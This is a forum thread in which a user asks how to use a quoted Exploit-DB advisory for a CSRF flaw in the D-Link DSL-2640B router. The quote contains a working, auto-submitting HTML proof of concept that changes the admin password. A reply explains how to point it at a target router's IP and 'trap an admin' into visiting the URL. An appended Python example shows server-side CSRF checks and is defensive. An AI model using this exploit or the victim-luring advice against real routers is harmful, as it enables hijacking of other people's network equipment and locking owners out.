Topic: D-Link DSL CSRF Exploit . How to Use/Test ??

FurqanHanif
D-Link DSL CSRF Exploit . How to Use/Test ??
« on: May 02, 2015, 11:20:53 pm »
Someone tell me how I use this exploit to test my router. There is only HTML code given; someone explain to me how I use this code exactly to change the password... ???

Quote
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : D-Link DSL-2640B (ADSL Router) CSRF Vulnerability
# Date          : 19-02-2012
# Author        : Ivano Binetti (http://ivanobinetti.com)
# Vendor site   : http://www.d-link.com
# Version       : DSL-2640B
# Tested on     : Firmware Version: EU_4.00; Hardware Version: B2
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Change Admin Account Password by Ivano Binetti]--------------------------------------------------+
Summary
 
1)Introduction
2)Vulnerability Description
3)Exploit
 
+---------------------------------------------------------------------------------------------------------------------------------+
 
 
1)Introduction
 
D-Link DSL-2640B is an ADSL Router using (also) a web management interface.
 
 
2)Vulnerability Description
 
The D-Link DSL-2640B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allow changing router
parameters and, among other things, changing the default administrator ("admin") password.
 
3)Exploit
 
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change ADMIN password</H2>
<form method="POST" name="form0" action="http://192.168.1.1:80/redpass.cgi?sysPassword=new_password&change=1">
</form>
</body>
</html>
 


https://www.exploit-db.com/exploits/18499/


n01xxv
Re: D-Link DSL CSRF Exploit . How to Use/Test ??
« Reply #1 on: May 03, 2015, 12:51:52 am »
Maybe the place of this topic is in the newbie section, because it seems that you don't know what a CSRF vuln is.
Read this: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29

The important part of the exploit is this:
http://192.168.1.1/redpass.cgi?sysPassword=new_password&change=1
Replace 192.168.1.1 with the IP address of the target router. After that you "just" have to trap an admin: if he goes to this URL, it will change his password to the wanted one (in this case: new_password, and if he is logged in as router admin).
The HTML code that you pasted just redirects to this link (with the onload in the body section).

Have fun !
« Last Edit: May 03, 2015, 12:53:18 am by n01xxv »
"Which came first, the bug or the exploit ?"
-- blackngel - Phrack 67 - 0x08
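
The server-side check whose absence the quoted advisory and the reply above describe, as an added example that is not part of the original thread, the advisory or D-Link's firmware. The function names, the `csrf_token` field and the session handling are assumptions; the admin origin is the address used in the quoted PoC.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: the admin UI is served from the address used in the quoted PoC.
ADMIN_ORIGIN = "http://192.168.1.1"
SERVER_KEY = secrets.token_bytes(32)  # per-boot secret, never sent to the browser


def issue_token(session_id: str) -> str:
    """Token the device would embed as a hidden field in its own forms."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def origin_of(url: str) -> str:
    """Reduce a Referer URL to scheme://host[:port]; empty string if unparsable."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}" if parts.scheme and parts.netloc else ""


def allow_state_change(method, headers, body, session_id):
    """Return (allowed, reason) for a request that would change configuration."""
    if method != "POST":
        return False, "state change must be POST"
    # Browsers attach Origin to cross-site POSTs; fall back to Referer.
    source = headers.get("Origin") or origin_of(headers.get("Referer", ""))
    if source != ADMIN_ORIGIN:
        return False, f"cross-origin request from {source or 'unknown'}"
    # The token is read from the body only: a foreign page cannot learn it,
    # and parameters placed in the query string are not trusted.
    supplied = body.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), issue_token(session_id).encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed sample requests (not captured traffic).
SESSION = "constructed-session-id"
FORGED = dict(method="POST", headers={"Origin": "http://attacker.example"},
              body={}, session_id=SESSION)  # shape of the auto-submitting form
LEGIT = dict(method="POST", headers={"Origin": ADMIN_ORIGIN},
             body={"sysPassword": "x", "csrf_token": issue_token(SESSION)},
             session_id=SESSION)

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("legit", LEGIT)):
        print(name, allow_state_change(**req))
```

The session cookie alone does not distinguish the two requests, since the browser sends it with both; the origin check and the per-session token are what separate them.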